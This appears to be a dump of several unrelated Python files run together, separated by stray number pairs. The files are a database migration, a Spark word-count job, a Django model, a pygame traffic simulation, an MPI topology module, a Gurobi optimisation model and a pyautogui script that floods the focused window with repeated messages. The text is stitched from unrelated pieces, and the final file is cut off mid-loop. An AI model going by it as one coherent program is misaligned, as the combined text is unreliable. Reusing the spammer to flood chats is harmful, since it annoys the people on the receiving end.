        sa.ForeignKeyConstraint(['color'], ['colors.value'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['product_id'], ['products.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['size'], ['sizes.value'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table('product_images',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('variety_id', sa.Integer(), nullable=False),
        sa.Column('image_id', sa.Integer(), nullable=False),
        sa.Column('order', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        # Deferred so image order can be re-shuffled within one transaction.
        sa.UniqueConstraint('variety_id', 'order', deferrable='True', initially='DEFERRED',
                            name='unique order indices')
    )
    op.create_table('projects',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(length=128), nullable=False),
        sa.Column('image_id', sa.Integer(), nullable=True),
        sa.Column('creation_time', sa.DateTime(timezone=True), nullable=False),
        sa.Column('organizer', sa.String(length=128), nullable=True),
        sa.Column('creator_email', sa.String(length=128), nullable=False),
        sa.Column('admin_feedback', sa.String(length=1024), nullable=True),
        sa.Column('review_status', sa.Enum('pending', 'approved', 'rejected', name='reviewstatus'),
                  nullable=True),
        sa.Column('lifetime_stage', sa.Enum('draft', 'ongoing', 'finalizing', 'finished',
                                            name='lifetimestage'), nullable=False),
        sa.ForeignKeyConstraint(['creator_email'], ['accounts.email'], ),
        sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('name')
    )
    op.create_table('stock_changes',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('amount', sa.Integer(), nullable=False),
        sa.Column('time', sa.DateTime(timezone=True), nullable=False),
        sa.Column('status', sa.Enum('carried_out', 'pending', 'ready_for_pickup', 'rejected',
                                    name='stockchangestatus'), nullable=False),
        sa.Column('account_email', sa.String(length=128), nullable=False),
        sa.Column('variety_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table('activities',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(length=128), nullable=True),
        sa.Column('description', sa.String(length=1024), nullable=True),
        sa.Column('start_date', sa.DateTime(timezone=True), nullable=True),
        sa.Column('end_date', sa.DateTime(timezone=True), nullable=True),
        sa.Column('project_id', sa.Integer(), nullable=False),
        sa.Column('working_hours', sa.Integer(), nullable=False),
        sa.Column('reward_rate', sa.Integer(), nullable=False),
        sa.Column('fixed_reward', sa.Boolean(), nullable=False),
        sa.Column('people_required', sa.Integer(), nullable=False),
        sa.Column('telegram_required', sa.Boolean(), nullable=False),
        sa.Column('application_deadline', sa.DateTime(timezone=True), nullable=True),
        sa.Column('feedback_questions', sa.ARRAY(sa.String(length=1024)), nullable=False),
        sa.Column('internal', sa.Boolean(), nullable=False, server_default='False'),
        # DB-enforced reward policy: fixed-reward activities count 1 hour,
        # otherwise the rate is pinned at 70.
        sa.CheckConstraint('(fixed_reward AND working_hours = 1) OR (NOT fixed_reward AND reward_rate = 70)',
                           name='reward policy'),
        sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('name', 'project_id', name='name is unique inside a project')
    )
    op.create_table('project_files',
        sa.Column('project_id', sa.Integer(), nullable=False),
        sa.Column('file_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['file_id'], ['static_files.id'], ),
        sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ),
        sa.PrimaryKeyConstraint('project_id', 'file_id')
    )
    op.create_table('project_moderation',
        sa.Column('project_id', sa.Integer(), nullable=False),
        sa.Column('account_email', sa.String(length=128), nullable=False),
        sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], onupdate='CASCADE', ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('project_id', 'account_email')
    )
    op.create_table('activity_competence',
        sa.Column('activity_id', sa.Integer(), nullable=False),
        sa.Column('competence_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('activity_id', 'competence_id')
    )
    op.create_table('applications',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('applicant_email', sa.String(length=128), nullable=False),
        sa.Column('activity_id', sa.Integer(), nullable=False),
        sa.Column('comment', sa.String(length=1024), nullable=True),
        sa.Column('application_time', sa.DateTime(timezone=True), nullable=False),
        sa.Column('telegram_username', sa.String(length=32), nullable=True),
        sa.Column('status', sa.Enum('approved', 'pending', 'rejected', name='applicationstatus'),
                  nullable=False),
        sa.Column('actual_hours', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['applicant_email'], ['accounts.email'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('applicant_email', 'activity_id', name='only one application')
    )
    # One-to-one with applications (PK doubles as the FK).
    op.create_table('feedback',
        sa.Column('application_id', sa.Integer(), nullable=False),
        sa.Column('time', sa.DateTime(timezone=True), nullable=False),
        sa.Column('answers', sa.ARRAY(sa.String(length=1024)), nullable=False),
        sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('application_id'),
        sa.UniqueConstraint('application_id')
    )
    op.create_table('reports',
        sa.Column('application_id', sa.Integer(), nullable=False),
        sa.Column('reporter_email', sa.String(length=128), nullable=False),
        sa.Column('time', sa.DateTime(timezone=True), nullable=False),
        sa.Column('rating', sa.Integer(), nullable=False),
        sa.Column('content', sa.String(length=1024), nullable=True),
        sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ),
        sa.ForeignKeyConstraint(['reporter_email'], ['accounts.email'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('application_id', 'reporter_email')
    )
    op.create_table('feedback_competence',
        sa.Column('feedback_id', sa.Integer(), nullable=False),
        sa.Column('competence_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('feedback_id', 'competence_id')
    )
    op.create_table('transactions',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('account_email', sa.String(length=128), nullable=False),
        sa.Column('change', sa.Integer(), nullable=False),
        sa.Column('stock_change_id', sa.Integer(), nullable=True),
        sa.Column('feedback_id', sa.Integer(), nullable=True),
        # A transaction references at most one source: stock change or feedback.
        sa.CheckConstraint('(stock_change_id IS NULL) OR (feedback_id IS NULL)',
                           name='not(feedback and stock_change)'),
        sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='SET NULL'),
        sa.ForeignKeyConstraint(['stock_change_id'], ['stock_changes.id'], ondelete='SET NULL'),
        sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###


def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Reverse dependency order: children before the tables they reference.
    op.drop_table('transactions')
    op.drop_table('feedback_competence')
    op.drop_table('reports')
    op.drop_table('feedback')
    op.drop_table('applications')
    op.drop_table('activity_competence')
    op.drop_table('project_moderation')
    op.drop_table('project_files')
    op.drop_table('activities')
    op.drop_table('stock_changes')
    op.drop_table('projects')
    op.drop_table('product_images')
    op.drop_table('varieties')
    op.drop_table('static_files')
    op.drop_table('notifications')
    op.drop_table('sizes')
    op.drop_table('products')
    op.drop_table('competences')
    op.drop_table('colors')
    op.drop_table('accounts')
    # ### end Alembic commands ###
12,433
4,095
import numpy as np
from ._CFunctions import _CDayNotoDate
from ._CTConv import _CTConv


def DayNotoDate(Year,Doy):
    '''
    Converts year and day numbers to a date of the format yyyymmdd.

    Inputs
    ======
    Year : int32
        Array or scalar of years
    Doy : int32
        Array or scalar of day numbers

    Returns
    =======
    Date : int
        Array or scalar of dates
    '''
    #convert the inputs into the exact dtypes required for C++
    _n = _CTConv(np.size(Doy),'c_int')
    _Year = _CTConv(Year,'c_int_ptr')
    _Doy = _CTConv(Doy,'c_int_ptr')
    #output buffer which the C++ routine fills in place
    _Date = np.zeros(_n,dtype='int32')

    #call the C++ function
    _CDayNotoDate(_n,_Year,_Doy,_Date)

    return _Date
636
273
##########################################################################################
# BigData - Application                                                                  #
##########################################################################################

##########################################################################################
# import libraries                                                                       #
##########################################################################################
import findspark
findspark.init()
from pyspark.sql import SparkSession
import happybase
from nltk.corpus import stopwords
import nltk
import pandas as pd
import pymongo
import sys
nltk.download("stopwords")
import time

##########################################################################################
# init spark                                                                             #
##########################################################################################
spark = SparkSession.builder\
    .master("local[*]")\
    .appName("application")\
    .getOrCreate()
sc = spark.sparkContext

##########################################################################################
# prerequisites                                                                          #
##########################################################################################
# Translation tables are built once at module level instead of chaining
# str.replace calls per word (one C-level pass per string).
_UMLAUT_TABLE = str.maketrans({
    'ä': 'ae', 'ö': 'oe', 'ü': 'ue',
    'Ä': 'Ae', 'Ö': 'Oe', 'Ü': 'Ue',
    'ß': 'ss',
})
_PUNC = '!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~-„“'
_PUNC_TABLE = str.maketrans(_PUNC, ' ' * len(_PUNC))


def umlauts(word):
    """Replace German umlauts and ß with their ASCII transliteration."""
    return word.translate(_UMLAUT_TABLE)


def lower_clean_str(x):
    """Lowercase *x* and replace punctuation characters with spaces."""
    return x.lower().translate(_PUNC_TABLE)


##########################################################################################
# Application                                                                            #
##########################################################################################
def application(news):
    """Return a one-column DataFrame ('trend-word') of the 5 most frequent
    non-stopword words across the given news titles."""
    # create Pipelined RDD, normalise, and split into non-empty words
    df = sc.parallelize(news)
    df = df.map(lower_clean_str)
    df = df.flatMap(lambda line: line.split(" "))
    df = df.filter(lambda w: w != '')

    # count how many times each word occurs
    count = df.map(lambda word: (word, 1))
    countRBK = count.reduceByKey(lambda x, y: (x + y)).sortByKey()

    # rank words by descending frequency
    countRBK = countRBK.map(lambda x: (x[1], x[0]))
    countRBK = countRBK.sortByKey(False)

    # get German stopwords with their umlauts transliterated; a set makes the
    # membership filter O(1) per word instead of O(n)
    german_stopwords = {umlauts(word) for word in stopwords.words('german')}
    countRBK = countRBK.filter(lambda x: x[1] not in german_stopwords)

    # PERF FIX: the original called countRBK.take(5) inside the loop,
    # launching a separate Spark job per trend word — take once.
    top5 = countRBK.take(5)

    # DataFrame.append is deprecated (removed in pandas 2.x); build the
    # frame in a single constructor call instead.
    return pd.DataFrame({'trend-word': [word for _, word in top5]})


##########################################################################################
# attaching database                                                                     #
##########################################################################################
def data_from_datalake():
    """Read all crawled article titles from the HBase data lake."""
    connection = happybase.Connection(host='lake-connection', port=9090, autoconnect=True)
    try:
        table = connection.table('crawled_articles')
        news = []
        for k, data in table.scan():
            news.append(data[b'data:title'].decode('utf-8'))
    finally:
        # ensure the HBase connection is released even if the scan fails
        connection.close()
    return news


##########################################################################################
# Run Application with Data                                                              #
##########################################################################################
def write_mongo(result):
    """Upsert the trend words into the MongoDB 'newscollection' collection."""
    print(result)
    client = pymongo.MongoClient('mongodb://mongo-connection:27017')
    try:
        # Specify the database and collection to be used
        db = client.news
        collection = db.newscollection

        dao_object = {"cat": "all", "titles": []}
        for i in range(len(result)):
            dao_object["titles"].append(result.iloc[i, 0])
        collection.update_one({"cat": "all"}, {"$set": dao_object}, upsert=True)
    finally:
        client.close()


# run whole application
write_mongo(application(data_from_datalake()))

# time sleep, so that the pod gets rebuilt only after completion
time.sleep(500)
4,996
1,354
# Re-export the package's public helpers at the package top level.
from .insert_sessions import insert_sessions
from .storage_dirs import base_dir, check_env, kachery_storage_dir
112
36
from django.db import models


class Experiment(models.Model):
    """A recorded benchmark run and its timing result."""

    # Values for `method` — presumably distinguishing an in-built
    # implementation from a third-party package; TODO(review): confirm
    # against the code that creates these records.
    INBUILT = 0
    PACKAGE = 1

    # Which implementation was measured (INBUILT or PACKAGE).
    method = models.IntegerField()
    # Comma/summary description of the field types used in the run.
    field_types = models.CharField(max_length=100)
    # Number of fields involved.
    fields = models.SmallIntegerField()
    # Number of records processed.
    count = models.IntegerField()
    # Batch size used during the run.
    batch_size = models.IntegerField()
    # Measured duration (units not recorded here — presumably seconds).
    time = models.FloatField()
327
105
import pyautogui, time
from time import sleep

# Burst size and the message to send.
spamnum = int(input("Input Number: "))
spamtext = input("What is the Message u want to send?: ")

# 10-second countdown so the user can focus the target window.
# BUG FIX: the counter was named `time`, shadowing the imported time module.
elapsed = 0
while elapsed != 10:
    elapsed += 1
    sleep(1)
    print("spammer waitinig.." + str(elapsed))


def spam(msg, maxMsg):
    """Type *msg* and press Enter *maxMsg* times, pausing 5 s after every
    `spamnum` messages to avoid flooding the target application."""
    count = 0
    while count != maxMsg:
        count += 1
        print("sendmessage:" + str(count))
        pyautogui.write(msg)
        pyautogui.press("enter")
        # BUG FIX: the original enumerated multiples by hand
        # (spamnum*1..4, spamnum*spamnum, spamnum*6..9, spamnum*20),
        # skipping *5 and *10..*19; the modulo test expresses the intent
        # and matches the original for every count actually reached.
        if count % spamnum == 0:
            sleep(5)


spam(spamtext, spamnum)
sleep(2)
pyautogui.write("done")
pyautogui.press("enter")
751
319
import random import time import threading import pygame import sys # Default values of signal timers defaultGreen = {0: 10, 1: 10, 2: 10, 3: 10} defaultRed = 150 defaultYellow = 5 signals = [] noOfSignals = 4 currentGreen = 0 # Indicates which signal is green currently nextGreen = (currentGreen + 1) % noOfSignals # Indicates which signal will turn green next currentYellow = 0 # Indicates whether yellow signal is on or off speeds = {'car': 2.25, 'bus': 1.8, 'truck': 1.8, 'bike': 2.5} # average speeds of vehicles # Coordinates of vehicles' start x = {'right': [0, 0, 0], 'down': [755, 727, 697], 'left': [1400, 1400, 1400], 'up': [602, 627, 657]} y = {'right': [348, 370, 398], 'down': [0, 0, 0], 'left': [498, 466, 436], 'up': [800, 800, 800]} vehicles = {'right': {0: [], 1: [], 2: [], 'crossed': 0}, 'down': {0: [], 1: [], 2: [], 'crossed': 0}, 'left': {0: [], 1: [], 2: [], 'crossed': 0}, 'up': {0: [], 1: [], 2: [], 'crossed': 0}} vehicleTypes = {0: 'car', 1: 'bus', 2: 'truck', 3: 'bike'} directionNumbers = {0: 'right', 1: 'down', 2: 'left', 3: 'up'} # Coordinates of signal image, timer, and vehicle count signalCoods = [(530, 230), (810, 230), (810, 570), (530, 570)] signalTimerCoods = [(530, 210), (810, 210), (810, 550), (530, 550)] # Coordinates of stop lines stopLines = {'right': 590, 'down': 330, 'left': 800, 'up': 535} defaultStop = {'right': 580, 'down': 320, 'left': 810, 'up': 545} # stops = {'right': [580,580,580], 'down': [320,320,320], 'left': [810,810,810], 'up': [545,545,545]} # Gap between vehicles stoppingGap = 15 # stopping gap movingGap = 15 # moving gap pygame.init() simulation = pygame.sprite.Group() class TrafficSignal: def __init__(self, red, yellow, green): self.red = red self.yellow = yellow self.green = green self.signalText = "" class Vehicle(pygame.sprite.Sprite): def __init__(self, lane, vehicleClass, direction_number, direction): pygame.sprite.Sprite.__init__(self) self.lane = lane self.vehicleClass = vehicleClass self.speed = 
speeds[vehicleClass] self.direction_number = direction_number self.direction = direction self.x = x[direction][lane] self.y = y[direction][lane] self.crossed = 0 vehicles[direction][lane].append(self) self.index = len(vehicles[direction][lane]) - 1 path = "images/" + direction + "/" + vehicleClass + ".png" self.image = pygame.image.load(path) if (len(vehicles[direction][lane]) > 1 and vehicles[direction][lane][ self.index - 1].crossed == 0): # if more than 1 vehicle in the lane of vehicle before it has crossed stop line if (direction == 'right'): self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][ self.index - 1].image.get_rect().width - stoppingGap # setting stop coordinate as: stop coordinate of next vehicle - width of next vehicle - gap elif (direction == 'left'): self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][ self.index - 1].image.get_rect().width + stoppingGap elif (direction == 'down'): self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][ self.index - 1].image.get_rect().height - stoppingGap elif (direction == 'up'): self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][ self.index - 1].image.get_rect().height + stoppingGap else: self.stop = defaultStop[direction] # Set new starting and stopping coordinate if (direction == 'right'): temp = self.image.get_rect().width + stoppingGap x[direction][lane] -= temp elif (direction == 'left'): temp = self.image.get_rect().width + stoppingGap x[direction][lane] += temp elif (direction == 'down'): temp = self.image.get_rect().height + stoppingGap y[direction][lane] -= temp elif (direction == 'up'): temp = self.image.get_rect().height + stoppingGap y[direction][lane] += temp simulation.add(self) def render(self, screen): screen.blit(self.image, (self.x, self.y)) def move(self): if (self.direction == 'right'): if (self.crossed == 0 and self.x + self.image.get_rect().width > 
stopLines[ self.direction]): # if the image has crossed stop line now self.crossed = 1 if ((self.x + self.image.get_rect().width <= self.stop or self.crossed == 1 or ( currentGreen == 0 and currentYellow == 0)) and ( self.index == 0 or self.x + self.image.get_rect().width < ( vehicles[self.direction][self.lane][self.index - 1].x - movingGap))): # (if the image has not reached its stop coordinate or has crossed stop line or has green signal) and (it is either the first vehicle in that lane or it is has enough gap to the next vehicle in that lane) self.x += self.speed # move the vehicle elif (self.direction == 'down'): if (self.crossed == 0 and self.y + self.image.get_rect().height > stopLines[self.direction]): self.crossed = 1 if ((self.y + self.image.get_rect().height <= self.stop or self.crossed == 1 or ( currentGreen == 1 and currentYellow == 0)) and ( self.index == 0 or self.y + self.image.get_rect().height < ( vehicles[self.direction][self.lane][self.index - 1].y - movingGap))): self.y += self.speed elif (self.direction == 'left'): if (self.crossed == 0 and self.x < stopLines[self.direction]): self.crossed = 1 if ((self.x >= self.stop or self.crossed == 1 or (currentGreen == 2 and currentYellow == 0)) and ( self.index == 0 or self.x > ( vehicles[self.direction][self.lane][self.index - 1].x + vehicles[self.direction][self.lane][ self.index - 1].image.get_rect().width + movingGap))): self.x -= self.speed elif (self.direction == 'up'): if (self.crossed == 0 and self.y < stopLines[self.direction]): self.crossed = 1 if ((self.y >= self.stop or self.crossed == 1 or (currentGreen == 3 and currentYellow == 0)) and ( self.index == 0 or self.y > ( vehicles[self.direction][self.lane][self.index - 1].y + vehicles[self.direction][self.lane][ self.index - 1].image.get_rect().height + movingGap))): self.y -= self.speed # Initialization of signals with default values def initialize(): ts1 = TrafficSignal(0, defaultYellow, defaultGreen[0]) signals.append(ts1) ts2 = 
TrafficSignal(ts1.red + ts1.yellow + ts1.green, defaultYellow, defaultGreen[1]) signals.append(ts2) ts3 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[2]) signals.append(ts3) ts4 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[3]) signals.append(ts4) repeat() def repeat(): global currentGreen, currentYellow, nextGreen while (signals[currentGreen].green > 0): # while the timer of current green signal is not zero updateValues() time.sleep(1) currentYellow = 1 # set yellow signal on # reset stop coordinates of lanes and vehicles for i in range(0, 3): for vehicle in vehicles[directionNumbers[currentGreen]][i]: vehicle.stop = defaultStop[directionNumbers[currentGreen]] while (signals[currentGreen].yellow > 0): # while the timer of current yellow signal is not zero updateValues() time.sleep(1) currentYellow = 0 # set yellow signal off # reset all signal times of current signal to default times signals[currentGreen].green = defaultGreen[currentGreen] signals[currentGreen].yellow = defaultYellow signals[currentGreen].red = defaultRed currentGreen = nextGreen # set next signal as green signal nextGreen = (currentGreen + 1) % noOfSignals # set next green signal signals[nextGreen].red = signals[currentGreen].yellow + signals[ currentGreen].green # set the red time of next to next signal as (yellow time + green time) of next signal repeat() # Update values of the signal timers after every second def updateValues(): for i in range(0, noOfSignals): if (i == currentGreen): if (currentYellow == 0): signals[i].green -= 1 else: signals[i].yellow -= 1 else: signals[i].red -= 1 # Generating vehicles in the simulation def generateVehicles(): daytime = 360 sleeptime = 0 while (True): lane_number = 2 # original version: random.randint(1,2) cartype = [60, 70, 80, 100] dist = [50, 100] temp1 = random.randint(0, 99) temp2 = random.randint(0, 99) direction_number = 0 if (temp1 < cartype[0]): vehicle_type = 0 elif (temp1 < cartype[1]): vehicle_type = 1 elif (temp1 < 
cartype[2]): vehicle_type = 2 elif (temp1 < cartype[3]): vehicle_type = 3 if (temp2 < dist[0]): direction_number = 0 elif (temp2 < dist[1]): direction_number = 3 if (daytime < 360): sleeptime = 5 elif (daytime >= 360 and daytime < 480): sleeptime = 2 elif (daytime >= 480 and daytime < 720): sleeptime = 3 elif (daytime >= 720 and daytime < 840): sleeptime = 2 elif (daytime >= 840 and daytime < 1080): sleeptime = 3 elif (daytime >= 1080 and daytime < 1260): sleeptime = 1 elif (daytime >= 1260): sleeptime = 4 Vehicle(lane_number, vehicleTypes[vehicle_type], direction_number, directionNumbers[direction_number]) time.sleep(sleeptime) daytime += sleeptime def turnp(probability): rnumber = random.uniform(0, 1) if rnumber > probability: return False else: return True class Main: thread1 = threading.Thread(name="initialization",target=initialize, args=()) # initialization thread1.daemon = True thread1.start() # Colours black = (0, 0, 0) white = (255, 255, 255) # Screensize screenWidth = 1400 screenHeight = 800 screenSize = (screenWidth, screenHeight) # Setting background image i.e. 
image of intersection background = pygame.image.load('images/intersection.png') screen = pygame.display.set_mode(screenSize) pygame.display.set_caption("SIMULATION") # Loading signal images and font redSignal = pygame.image.load('images/signals/red.png') yellowSignal = pygame.image.load('images/signals/yellow.png') greenSignal = pygame.image.load('images/signals/green.png') font = pygame.font.Font(None, 30) thread2 = threading.Thread(name="generateVehicles",target=generateVehicles, args=()) # Generating vehicles thread2.daemon = True thread2.start() while True: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() screen.blit(background,(0,0)) # display background in simulation for i in range(0,noOfSignals): # display signal and set timer according to current status: green, yello, or red if(i==currentGreen): if(currentYellow==1): signals[i].signalText = signals[i].yellow screen.blit(yellowSignal, signalCoods[i]) else: signals[i].signalText = signals[i].green screen.blit(greenSignal, signalCoods[i]) else: if(signals[i].red<=10): signals[i].signalText = signals[i].red else: signals[i].signalText = "---" screen.blit(redSignal, signalCoods[i]) signalTexts = ["","","",""] # display signal timer for i in range(0,noOfSignals): signalTexts[i] = font.render(str(signals[i].signalText), True, white, black) screen.blit(signalTexts[i],signalTimerCoods[i]) # display the vehicles for vehicle in simulation: screen.blit(vehicle.image, [vehicle.x, vehicle.y]) vehicle.move() pygame.display.update() Main()
12,795
4,117
# Authors: # Loic Gouarin <loic.gouarin@polytechnique.edu> # Benjamin Graille <benjamin.graille@math.u-psud.fr> # # License: BSD 3 clause """ Module which implements a Cartesian MPI topology """ import numpy as np import mpi4py.MPI as mpi from .options import options class MpiTopology: """ Interface construction using a MPI topology. Parameters ---------- dim : int number of spatial dimensions (1, 2, or 3) comm : comm the default MPI communicator period : list boolean list that specifies if a direction is periodic or not. Its size is dim. Attributes ---------- dim : int number of spatial dimensions (1, 2, or 3) comm : comm the communicator of the topology split : tuple number of processes in each direction neighbors : list list of the neighbors where we have to send and to receive messages sendType : list list of subarrays that defines the part of data to be send sendTag : list list of tags for the send messages recvType : list list of subarrays that defines the part of data to update during a receive message recvTag : list list of tags for the receive messages Methods ------- set_options : defines command line options. get_coords : return the coords of the process in the MPI topology. set_subarray : create subarray for the send and receive message update : update a numpy array according to the subarrays and the topology. """ def __init__(self, dim, period, comm=mpi.COMM_WORLD): self.dim = dim self.set_options() self.comm = comm # if npx, npy and npz are all set to the default value (1) # then Compute_dims performs the splitting of the domain if self.npx == self.npy == self.npz == 1: size = comm.Get_size() split = mpi.Compute_dims(size, self.dim) else: split = (self.npx, self.npy, self.npz) self.split = np.asarray(split[:self.dim]) self.cartcomm = comm.Create_cart(self.split, period) def get_region_indices_(self, n, axis=0): """ 1D region indices owned by each sub domain. 
Parameters ---------- n : int number of total discrete points for a given axis axis : int axis used in the MPI topology Returns ------- list list of regions owned by each processes for a given axis """ region_indices = [0] nproc = self.cartcomm.Get_topo()[0][axis] for i in range(nproc): region_indices.append(region_indices[-1] + n//nproc + ((n % nproc) > i)) return region_indices def get_region_indices(self, nx, ny=None, nz=None): """ Region indices owned by each sub domain. Parameters ---------- nx : int number of total discrete points in x direction ny : int number of total discrete points in y direction default is None nz : int number of total discrete points in z direction default is None Returns ------- list list of regions owned by each processes """ region_indices = [self.get_region_indices_(nx, 0)] if ny is not None: region_indices.append(self.get_region_indices_(ny, 1)) if nz is not None: region_indices.append(self.get_region_indices_(nz, 2)) return region_indices def get_coords(self): """ return the coords of the process in the MPI topology as a numpy array. """ rank = self.cartcomm.Get_rank() return np.asarray(self.cartcomm.Get_coords(rank)) def get_region(self, nx, ny=None, nz=None): """ Region indices owned by the sub domain. Parameters ---------- nx : int number of total discrete points in x direction ny : int number of total discrete points in y direction default is None nz : int number of total discrete points in z direction default is None Returns ------- list region owned by the process """ region_indices = self.get_region_indices(nx, ny, nz) coords = self.get_coords() region = [] for i in range(coords.size): region.append([region_indices[i][coords[i]], region_indices[i][coords[i] + 1] ]) return region def set_options(self): """ defines command line options. """ self.npx = int(options().npx) self.npy = int(options().npy) self.npz = int(options().npz) def get_directions(dim): """ Return an array with all the directions around. 
Parameters ---------- dim : int number of spatial dimensions (1, 2, or 3) Returns ------- ndarray all the possible directions with a stencil of 1 Examples -------- >>> get_directions(1) array([[-1], [ 0], [ 1]]) >>> get_directions(2) array([[-1, -1], [-1, 0], [-1, 1], [ 0, -1], [ 0, 0], [ 0, 1], [ 1, -1], [ 1, 0], [ 1, 1]], dtype=int32) """ common_direction = np.array([-1, 0, 1]) if dim == 1: directions = common_direction[:, np.newaxis] elif dim == 2: common_direction = common_direction[np.newaxis, :] directions = np.empty((9, 2), dtype=np.int32) directions[:, 0] = np.repeat(common_direction, 3, axis=1).flatten() directions[:, 1] = np.repeat(common_direction, 3, axis=0).flatten() elif dim == 3: common_direction = common_direction[np.newaxis, :] directions = np.empty((27, 3), dtype=np.int32) directions[:, 0] = np.repeat(common_direction, 9, axis=1).flatten() directions[:, 1] = np.repeat(np.repeat(common_direction, 3, axis=0), 3).flatten() directions[:, 2] = np.repeat(common_direction, 9, axis=0).flatten() return directions
6,327
1,910
from gurobipy import * import math import numpy as np import heapq def heap_sort(items): heapq.heapify(items) items[:] = [heapq.heappop(items) for i in range(len(items))] return items def createGraph(input_file, instance_format): global n, m , k, matrix, ordered_sizes if instance_format == 'orlib': f = open(input_file, "r") matrix = [] for i in range(0,n): list = [] for j in range(0,n): list.append(float("inf")) matrix.append(list) m = sum(1 for line in open(input_file)) #with open(input_file, "r") as f: for i in range(0, m): string = f.readline() string = string.split() if string is not "EOF": v1 = int(string[0]) - 1 v2 = int(string[1]) - 1 weight = int(string[2]) matrix[v1][v2] = weight matrix[v2][v1] = weight f.close() for i in range(0, n): matrix[i][i] = 0 for i in range(0, n): #print(i) for j in range(0, n): for l in range(0, n): if matrix[i][j] == float("inf") or matrix[i][l] == float("inf"): cost = float("inf") else: cost = matrix[i][j] + matrix[i][l] if cost < matrix[j][l]: matrix[j][l] = cost ordered_sizes = [] for i in range(0, n): for j in range(i, n): ordered_sizes.append(matrix[i][j]) ordered_sizes = heap_sort(ordered_sizes) elif instance_format == 'tsplib': f = open(input_file, "r") m = n matrix = [] for i in range(0,n): list = [] for j in range(0,n): list.append(float("inf")) matrix.append(list) positions = [] for i in range(0, m): string = f.readline() string = string.split() temp_position = [] temp_position.append(int(string[0])-1) temp_position.append(float(string[1])) temp_position.append(float(string[2])) positions.append(temp_position) for i in range(0, n): for j in range(0, n): dist_temp = math.sqrt(((positions[i][1] - positions[j][1]) * (positions[i][1] - positions[j][1])) + ((positions[i][2] - positions[j][2]) * (positions[i][2] - positions[j][2]))) matrix[i][j] = dist_temp matrix[j][i] = dist_temp f.close() for i in range(0, n): matrix[i][i] = 0 ordered_sizes = [] for i in range(0, n): for j in range(i, n): 
ordered_sizes.append(matrix[i][j]) ordered_sizes = heap_sort(ordered_sizes) def run(r): global total_runtime, k, runtime, num_centers, m, cap, input_file prunedMatrix = [] for i in range(0,n): list = [] for j in range(0,n): list.append(float(0)) prunedMatrix.append(list) for i in range(0,n): for j in range(0,n): if matrix[i][j] <= r: prunedMatrix[i][j] = 1 try: global m, num_centers, runtime, cap m = Model("mip1") #****************************************************************************************************** m.setParam("MIPGap", 0.0); #****************************************************************************************************** y = [] for i in range(n): y.append(0) for i in range(n): y[i] = m.addVar(vtype=GRB.BINARY, name="y%s" % str(i+1)) m.setObjective(sum(y), GRB.MINIMIZE) temp_list = np.array(prunedMatrix).T.tolist() for i in range(n): m.addConstr(sum(np.multiply(temp_list[i], y).tolist()) >= 1) x = [] for i in range(n): temp = [] for j in range(n): temp.append(0) x.append(temp) for i in range(n): for j in range(n): x[i][j] = m.addVar(vtype=GRB.BINARY, name="x%s%s" % (str(i+1), str(j+1))) temp_list_2 = np.array(x).T.tolist() for i in range(n): m.addConstr(sum(temp_list_2[i]) * y[i] <= L) for i in range(n): for j in range(n): #m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j]) #****************************************************************************************************** m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j] * (1-y[i])) #****************************************************************************************************** for i in 